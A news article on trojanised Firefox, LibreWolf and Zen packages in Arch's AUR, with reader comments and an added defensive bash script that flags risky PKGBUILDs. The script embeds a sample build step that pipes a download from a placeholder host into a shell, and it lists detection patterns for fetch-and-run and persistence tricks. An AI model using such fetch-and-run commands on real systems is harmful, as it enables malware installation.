News: 1753206194

Arch Linux users told to purge Firefox forks after AUR malware scare

(2025/07/22)


If you installed the Firefox, LibreWolf, or Zen web browsers from the Arch User Repository (AUR) in the last few days, delete them immediately and install fresh copies.

A [1]security warning from the Arch Linux maintainers concerns three malicious packages in the AUR, each posing as a build of one of the leading Firefox-based browsers. The distro itself hasn't been breached, and the official repositories were never touched. Unfortunately, the attack is a direct consequence of how Arch's repositories are structured and maintained: anyone with an account can upload a package to the AUR.

The warning concerns three browsers from the greater Mozilla family: Firefox itself; a fork called [2]LibreWolf, which removes some Mozilla telemetry and otherwise tightens up Firefox's security and privacy a bit more; and the fancy tiling [3]Zen browser, which [4]we looked at last year.

All three packages were uploaded to the [6]AUR on July 16 under the names librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin. Note what these were not: they were not tampered versions of existing packages but brand-new packages with plausible-looking names, and Firefox itself isn't distributed via the AUR at all; it ships in Arch's official extra repository. The three reportedly contained a Remote Access Trojan (RAT). Less than two days later, the packages were identified and removed. If you installed any of them, remove it immediately and then reboot, but be clear about what that does and doesn't achieve: pacman removes only the files it installed, and a reboot only kills whatever is currently running. A RAT that has already copied itself elsewhere and arranged to be restarted will survive both. The official advice is to "take the necessary measures in order to ensure they were not compromised" – which is absolutely correct as far as it goes. The problem is, of course, that you need considerable Linux expertise to check for unknown processes running on your machine, for unexpected outbound connections through your firewall, or for new cron jobs, systemd units, and shell start-up files that would bring the malware back.

Arch is not one of the big-name distros, but it is one of the most used. As we reported last year, [9]about twice as many gamers use it as Ubuntu. This may in part be because Valve's Steam Deck runs it. [10]SteamOS 3 is based on Arch, and the company has been investing serious effort into improving the base OS.

The reason you don't hear about Arch quite so much is that the companies that make most of the noise in the Linux world, issuing fancy surveys and so on, are mainly enterprise vendors. As a community-maintained rolling-release distro, Arch is the opposite.

This appeals to enthusiasts who have dabbled for a while and acquired some Linux knowledge. Arch has only a rudimentary installation program, and you have to install most of the components of your OS yourself. This gives certain types of user warm, fuzzy feelings of ownership and control.

It does make it harder to get a complete fully functional OS up and running, though, which is why there are multiple easier distros based upon Arch, but bundled with nice, easy graphical installers. As examples, we have looked at a few of these, including [12]EndeavourOS, [13]Garuda Linux, and [14]Manjaro.

Between official Arch and the remixes, plus Steam Deck users, there are a lot of Arch users out there – and most of them aren't likely to be used to conducting Linux security audits. Unfortunately, for non-techie Arch users who installed one of these browser packages, the most thorough solution is to back up their data, reformat, and reinstall. Back up documents and files, not the whole home directory wholesale: restoring shell start-up files, cron entries, or systemd user units from the infected system could restore the malware's persistence along with them.

This is a snag of the way Arch works, but the "snag" is also one of the greatest strengths of the distro. Most distros only maintain official repositories with a restricted set of FOSS software. If you want an app that isn't in the official repos – which often means proprietary freeware such as Chrome, Zoom, Slack, Steam, and so on – then you must use some external source of software, such as one of the big-name cross-distro app stores: the Canonical-backed Snap Store, or the Red Hat-backed Flatpak system and Flathub.

The AUR is Arch's answer to this pickle. It's a special package repo where Arch users who have packaged Linux apps for their own use can upload and share their contributions. The AUR is separate and distinct from the [20]main package repositories of the Arch project itself, which are called core, extra, and multilib, plus various testing repositories. What you get from the AUR is not a ready-built binary but a build recipe, the PKGBUILD, which is executed on your own machine. pacman itself never installs from the AUR: you either clone the package's git repository and run makepkg yourself, or use an AUR helper such as yay or paru that does it for you. Some Arch derivatives fold AUR access into their graphical package managers, which is where "enabling the AUR" becomes a checkbox that users tick without reading what it implies.

So, as with so much in life, there's a balance. On the good side, with just one extra step (enabling the AUR), Arch users gain access to native packages of almost any and every Linux app in the world. But on the bad side, lots of these packages come from a chaotic free-for-all source that is largely unpoliced and occasionally contains nasty surprises. This is not the first time someone's put malware in the AUR. The Register was reporting on it [21]way back in 2018, and there are a lot more Arch users now than then.
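Before building anything from the AUR, the one defence in the user's hands is to read the PKGBUILD. As an added example (not code from the article, the advisory, or the Arch project), the script below does a first-pass triage of a PKGBUILD and flags the things worth reading by hand: checksums set to SKIP, sources fetched from a host other than the package's own url=, build steps that pipe a download into a shell or execute a downloaded script, and an install= hook. The two PKGBUILDs embedded in it are constructed for the demonstration; the hostnames under example.invalid are placeholders, and the "suspicious" one is not a copy of any of the three malicious packages.

```shell
#!/usr/bin/env bash
# Added example, not code from the article or the Arch project: first-pass
# triage of an AUR PKGBUILD before handing it to makepkg. It prints one
# "flag:" line per pattern a reviewer should read by hand; it blocks nothing.
#
# Both PKGBUILDs below are constructed for this demonstration. Hostnames under
# example.invalid are placeholders (the .invalid TLD never resolves), and the
# suspicious one is NOT a copy of librewolf-fix-bin, firefox-patch-bin or
# zen-browser-patched-bin; it only imitates the shape of a trojanised -bin
# package: SKIP checksums, a second source from a non-upstream host, a
# downloaded script executed in package(), a pipe-to-shell fetch, and an
# install= hook that pacman runs as root.
SUSPICIOUS_PKGBUILD='pkgname=browser-fix-bin
pkgver=1.2.3
pkgrel=1
arch=("x86_64")
url="https://upstream.example.invalid"
source=("https://upstream.example.invalid/releases/browser-${pkgver}.tar.xz"
        "fix.sh::https://files.example.invalid/fix.sh")
sha256sums=("SKIP" "SKIP")
install=browser-fix-bin.install

package() {
  tar -xf "browser-${pkgver}.tar.xz" -C "$pkgdir/opt"
  bash "$srcdir/fix.sh"
  curl -fsSL https://files.example.invalid/setup | sh
}'

# Constructed, unremarkable: one source from the upstream host, a real digest.
CLEAN_PKGBUILD='pkgname=browser-bin
pkgver=1.2.3
pkgrel=1
arch=("x86_64")
url="https://upstream.example.invalid"
source=("https://upstream.example.invalid/releases/browser-${pkgver}.tar.xz")
sha256sums=("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")

package() {
  tar -xf "browser-${pkgver}.tar.xz" -C "$pkgdir/opt"
}'

# audit_pkgbuild FILE: print a "flag:" line per finding. Always returns 0.
audit_pkgbuild() {
    f="$1"
    # Quotes stripped so url= and source= hosts compare as plain text.
    stripped=$(tr -d "\"'" < "$f")

    # 1. SKIP in a checksum array with no VCS source: makepkg then accepts
    #    whatever the server happens to send today.
    if printf '%s\n' "$stripped" | grep -Eq '(^|[^A-Za-z])SKIP([^A-Za-z]|$)' \
       && ! grep -Eq '(git|hg|svn|bzr|fossil)\+' "$f"; then
        echo "flag: checksum SKIP on a non-VCS source, makepkg will not verify the download"
    fi

    # 2. Every host fetched from that is not the package's own url= host.
    upstream=$(printf '%s\n' "$stripped" | sed -nE 's#^url=https?://([^/]+).*#\1#p' | head -n 1)
    printf '%s\n' "$stripped" | grep -oE 'https?://[^/[:space:])]+' \
        | sed -E 's#^https?://##' | sort -u \
        | while read -r host; do
            [ "$host" = "$upstream" ] || echo "flag: fetches from $host, upstream url= is $upstream"
          done

    # 3. Build-time behaviour a packaging script has no business doing.
    for pat in \
        'curl[^|]*[|][[:space:]]*(ba|z)?sh' \
        'wget[^|]*[|][[:space:]]*(ba|z)?sh' \
        '(ba)?sh[[:space:]]+"?\$[{]?srcdir' \
        'base64[[:space:]]+(-d|--decode)' \
        '(^|[[:space:]])eval[[:space:]]' \
        'crontab|systemctl[[:space:]]+(--user[[:space:]]+)?enable|\.bashrc|\.config/autostart|nohup|setsid'
    do
        if grep -Eq "$pat" "$f"; then
            echo "flag: build step matches /$pat/"
        fi
    done

    # 4. install= hooks run their pre/post_install() as root at pacman -U time.
    if grep -Eq '^install=' "$f"; then
        echo "flag: install= hook, read its post_install() as well"
    fi
    return 0
}

# count_flags FILE: number of findings, as a plain integer.
count_flags() {
    audit_pkgbuild "$1" | awk '/^flag:/ { n++ } END { print n + 0 }'
}

# write_sample CONTENT: save an embedded PKGBUILD to a temp file, print its path.
write_sample() {
    t=$(mktemp)
    printf '%s\n' "$1" > "$t"
    echo "$t"
}

# Demo run over both constructed samples.
s=$(write_sample "$SUSPICIOUS_PKGBUILD"); c=$(write_sample "$CLEAN_PKGBUILD")
echo "== suspicious ($(count_flags "$s") flags) =="; audit_pkgbuild "$s"
echo "== clean ($(count_flags "$c") flags) ==";      audit_pkgbuild "$c"
rm -f "$s" "$c"
```

On a real package, clone it with `git clone https://aur.archlinux.org/<pkgname>.git` and point audit_pkgbuild at the PKGBUILD before running makepkg; `pacman -Qm` lists the foreign (non-repository) packages already installed, which is where anything from the AUR shows up. A clean report is not a verdict: the script only narrows down what to read, and for a -bin package the payload lives inside the downloaded archive, which makepkg never inspects.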

Nor is this unique to Arch. The same year, The Reg [22]reported on malware in the Snap Store, and Canonical too [23]banished them in two days. Even so, we [24]reported on similar problems last year.

Other app stores have comparable issues. The bulk of Flathub's apps are not official packages, and when we [25]looked at Linux Mint 22, we noted that its setting to only show verified packages on Flathub left a very sparse menu. Unofficial packages [26]caused problems for OBS Studio users on Fedora, too. Malware has also [27]cropped up on the Google Play Store, and [28]more than once.

There is no easy answer to this. There are bad people in the world and always will be. The Arch project isn't at fault here: it removed the packages within two days and published a warning rather than staying quiet. ®


[1] https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/

[2] https://librewolf.net/

[3] https://zen-browser.app/

[4] https://www.theregister.com/2024/09/02/zen_firefox_fork_alpha/

[6] https://aur.archlinux.org/

[9] https://www.theregister.com/2024/10/03/valve_sponsors_arch/

[10] https://www.theregister.com/2023/09/27/osseu_steam_os_3/

[12] https://www.theregister.com/2022/06/29/endeavouros_artemis_226/

[13] https://www.theregister.com/2022/07/28/garuda_linux_arch_better/

[14] https://www.theregister.com/2024/05/24/manjaro_24_easier_arch/

[20] https://wiki.archlinux.org/title/Official_repositories

[21] https://www.theregister.com/2018/07/11/someone_modified_arch_linuxs_acrobat_reader_adds_security_warning/

[22] https://www.theregister.com/2018/05/16/canonical_snaps_review_process_improvements_promised/

[23] https://www.theregister.com/2018/05/14/ubuntu_crypto_mining_apps/

[24] https://www.theregister.com/2024/03/28/canonical_snap_store_scams/

[25] https://www.theregister.com/2024/07/29/linus_mint_22_wilma/

[26] https://www.theregister.com/2025/02/25/fedora_obs_flatpak_dispute/

[27] https://www.theregister.com/2022/04/11/in_brief_security/

[28] https://www.theregister.com/2022/11/07/in_brief_security/



beast666

Even better:

Delete them immediately and install Brave.

Liam Proven

https://www.spacebar.news/stop-using-brave-browser/

https://thelibre.news/no-really-dont-use-brave/

Common sense should always be applied

Chubango

I'm a long-time user of Arch (since about 2008) and don't use the AUR for much as the official repositories cover almost all of my needs. When I do install something from the AUR it's usually a development version of a package (-git) for testing/temporarily needing a bleeding-edge version for whatever reason and it's just a more convenient way of building something from source as it takes care of tracking dependencies for me. Still, the same pitfalls from manually building from source exist. And for someone who doesn't understand what they're doing, it can be like copy-pasting random commands found on SO and the like. Users should look at the listed upstream source and examine the PKGBUILD file to see if there's anything unusual there. And even then it's wise to be skeptical of these user-created packages as there's opportunity for all sorts of shenanigans as pointed out by this article. More popular packages do tend to get adopted officially by the distro in time, however, and user comments can be helpful as well.

"User-friendly" Arch derivatives don't do a good enough job of warning users of the potentially serious risks of enabling the AUR (or explaining what it is, really) in their graphical front ends either. I've encountered my fair share of newbies over the years who have mucked things up just by blindly installing things from the AUR. This breakage can be especially egregious in Manjaro as they arbitrarily hold back packages for weeks in their own repos and the AUR—obviously—assumes you're on regular Arch, running the latest stable packages. (Essentially, you're doing partial upgrades and that [1]goes against Arch's model .)

(Wholly unrelated but adding 'ILoveCandy' to your pacman.conf is a great little easter egg.)

[1] https://wiki.archlinux.org/title/System_maintenance#Partial_upgrades_are_unsupported

The official message from Arch is negligent

Dan 55

[1]The message doesn't say which versions of the packages or how one can tell the malware has been installed or even what malware it is.

Also, anyone can upload to AUR without checks. Brilliant design guys.

[1] https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/

Re: The official message from Arch is negligent

Liam Proven

I think those entire packages are unsafe.

Re: The official message from Arch is negligent

zimzam

They're not poisoned updates to the regular versions, they're completely separate versions. Firefox isn't even officially in the AUR, it's in the extra repo.

Arch Linux is not designed for casual users, and the AUR in particular is intended to be used sparingly. You should not be getting your browser from there unless you're willing to check the build scripts yourself.

Re: The official message from Arch is negligent

zimzam

*completely separate packages.
